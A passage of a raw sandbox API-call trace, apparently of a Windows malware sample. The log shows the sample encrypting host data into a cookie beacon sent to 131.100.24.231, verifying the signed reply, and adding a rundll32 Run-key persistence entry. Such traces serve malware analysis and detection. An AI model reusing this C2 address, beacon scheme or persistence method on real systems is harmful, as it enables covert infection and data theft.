returned="tfnfdhfu.kqr" [0362.319] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0362.319] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0362.319] FindClose (in: hFindFile=0x2a83ae0 | out: hFindFile=0x2a83ae0) returned 1 [0362.320] GetProcessHeap () returned 0x530000 [0362.320] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0362.320] GetProcessHeap () returned 0x530000 [0362.320] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7278 [0362.320] GetProcessHeap () returned 0x530000 [0362.320] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0362.321] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0362.322] GetProcessHeap () returned 0x530000 [0362.322] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7278 | out: hHeap=0x530000) returned 1 [0362.322] GetProcessHeap () returned 0x530000 [0362.322] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0362.322] GetProcessHeap () returned 0x530000 [0362.322] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0362.322] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0362.322] GetProcessHeap () returned 0x530000 [0362.323] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0362.323] GetProcessHeap () returned 0x530000 [0362.323] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0362.323] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0362.323] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0362.323] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0362.323] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0362.323] GetProcessHeap () returned 0x530000 [0362.323] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0362.323] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0362.323] GetProcessHeap () returned 0x530000 [0362.323] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0362.323] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0362.323] GetProcessHeap () returned 0x530000 [0362.323] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0362.324] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0362.324] GetProcessHeap () returned 0x530000 [0362.324] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xc3) returned 0x29cca80 [0362.324] GetProcessHeap () returned 0x530000 [0362.324] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0362.324] GetProcessHeap () returned 0x530000 [0362.324] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0362.324] CryptBinaryToStringW (in: pbBinary=0x29cca80, cbBinary=0xc3, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0362.324] GetProcessHeap () returned 0x530000 [0362.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20a) returned 0x2b65430 [0362.325] CryptBinaryToStringW (in: pbBinary=0x29cca80, cbBinary=0xc3, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThY+Uk4ACMRhGiKFoSED7mhwya7r1a7li9JdivHgOrQokbXp", pcchString=0x2cf504) returned 1 [0362.325] GetProcessHeap () returned 0x530000 [0362.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0362.325] GetProcessHeap () returned 0x530000 [0362.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f18 [0362.325] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: vilnZ=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThY+Uk4ACMRhGiKFoSED7mhwya7r1a7li9JdivHgOrQokbXp\r\n") returned 276 [0362.325] GetProcessHeap () returned 0x530000 [0362.325] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f18 | out: hHeap=0x530000) returned 1 [0362.325] GetProcessHeap () returned 0x530000 [0362.325] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0362.325] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0362.326] GetProcessHeap () returned 0x530000 [0362.326] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0362.326] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0362.328] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="grco", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0362.328] GetProcessHeap () returned 0x530000 [0362.328] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0362.328] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0362.328] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0362.328] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0362.328] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: vilnZ=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThY+Uk4ACMRhGiKFoSED7mhwya7r1a7li9JdivHgOrQokbXp\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0363.515] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0363.515] GetProcessHeap () returned 0x530000 [0363.515] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0363.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x152) returned 1 [0363.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f52, dwNumberOfBytesToRead=0xfeae, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f52*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0363.516] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0363.516] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0363.517] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0363.517] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0363.517] GetProcessHeap () returned 0x530000 [0363.517] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0363.517] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0363.517] GetProcessHeap () returned 0x530000 [0363.517] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72a8 [0363.518] GetProcessHeap () returned 0x530000 [0363.518] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0363.518] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0363.519] GetProcessHeap () returned 0x530000 [0363.519] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72a8 | out: hHeap=0x530000) returned 1 [0363.519] GetProcessHeap () returned 0x530000 [0363.519] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0363.519] GetProcessHeap () returned 0x530000 [0363.519] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0363.519] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0363.519] GetProcessHeap () returned 0x530000 [0363.520] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0363.520] GetProcessHeap () returned 0x530000 [0363.520] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0363.520] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0363.520] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0363.520] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0363.520] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0363.520] GetProcessHeap () returned 0x530000 [0363.520] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0363.521] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0363.521] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0363.522] GetProcessHeap () returned 0x530000 [0363.522] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c750 [0363.522] GetProcessHeap () returned 0x530000 [0363.523] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0363.523] GetProcessHeap () returned 0x530000 [0363.523] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0363.523] GetProcessHeap () returned 0x530000 [0363.523] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x29cca80 | out: hHeap=0x530000) returned 1 [0363.523] GetProcessHeap () returned 0x530000 [0363.524] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0363.524] GetProcessHeap () returned 0x530000 [0363.524] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0363.524] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0363.525] GetProcessHeap () returned 0x530000 [0363.525] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0363.525] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",UsiQqsOJaBqzaZz") returned 105 [0363.525] GetProcessHeap () returned 0x530000 [0363.525] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0363.525] GetProcessHeap () returned 0x530000 [0363.525] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0363.525] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0363.526] GetProcessHeap () returned 0x530000 [0363.526] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0363.527] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",UsiQqsOJaBqzaZz") returned 105 [0363.527] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",UsiQqsOJaBqzaZz", cbData=0xd4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",UsiQqsOJaBqzaZz") returned 0x0 [0363.528] RegCloseKey (hKey=0x658) returned 0x0 [0363.528] GetProcessHeap () returned 0x530000 [0363.528] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c750 | out: hHeap=0x530000) returned 1 [0363.528] GetProcessHeap () returned 0x530000 [0363.528] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0363.529] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe632c) returned 0x102 [0373.534] GetProcessHeap () returned 0x530000 [0373.534] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72a8 [0373.534] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0373.534] GetProcessHeap () returned 0x530000 [0373.534] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72a8 | out: hHeap=0x530000) returned 1 [0373.534] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0373.534] GetProcessHeap () returned 0x530000 [0373.535] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72a8 [0373.535] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0373.535] GetProcessHeap () returned 0x530000 [0373.535] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72a8 | out: hHeap=0x530000) returned 1 [0373.535] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0373.538] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0373.538] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0373.538] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0373.538] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0373.538] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0373.538] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0373.539] GetProcessHeap () returned 0x530000 [0373.539] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0373.539] GetProcessHeap () returned 0x530000 [0373.539] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72a8 [0373.539] GetProcessHeap () returned 0x530000 [0373.539] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0373.539] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0373.541] GetProcessHeap () returned 0x530000 [0373.542] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72a8 | out: hHeap=0x530000) returned 1 [0373.542] GetProcessHeap () returned 0x530000 [0373.542] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0373.542] GetProcessHeap () returned 0x530000 [0373.542] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0373.542] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0373.542] GetProcessHeap () returned 0x530000 [0373.542] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0373.542] GetProcessHeap () returned 0x530000 [0373.542] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0373.543] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0373.543] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0373.543] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0373.543] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0373.543] GetProcessHeap () returned 0x530000 [0373.543] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0373.543] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0373.543] GetProcessHeap () returned 0x530000 [0373.543] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0373.543] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0373.543] GetProcessHeap () returned 0x530000 [0373.543] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0373.543] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0373.543] GetProcessHeap () returned 0x530000 [0373.543] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd4) returned 0x2996d60 [0373.543] GetProcessHeap () returned 0x530000 [0373.544] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0373.544] GetProcessHeap () returned 0x530000 [0373.544] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0373.544] CryptBinaryToStringW (in: pbBinary=0x2996d60, cbBinary=0xd4, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0373.544] GetProcessHeap () returned 0x530000 [0373.544] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x23a) returned 0x2b65430 [0373.544] CryptBinaryToStringW (in: pbBinary=0x2996d60, cbBinary=0xd4, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTn6mz3bw+IgpANfPBP7x1Dw8WcC1g1z8MflLARQ0y0Mhun2HMOdpWrVDTNjd3WexkXSXcTA=", pcchString=0x2cf504) returned 1 [0373.544] GetProcessHeap () returned 0x530000 [0373.544] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0373.544] GetProcessHeap () returned 0x530000 [0373.544] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63058 [0373.545] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: RCZQeELm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTn6mz3bw+IgpANfPBP7x1Dw8WcC1g1z8MflLARQ0y0Mhun2HMOdpWrVDTNjd3WexkXSXcTA=\r\n") returned 303 [0373.545] GetProcessHeap () returned 0x530000 [0373.545] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63058 | out: hHeap=0x530000) returned 1 [0373.545] GetProcessHeap () returned 0x530000 [0373.545] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | 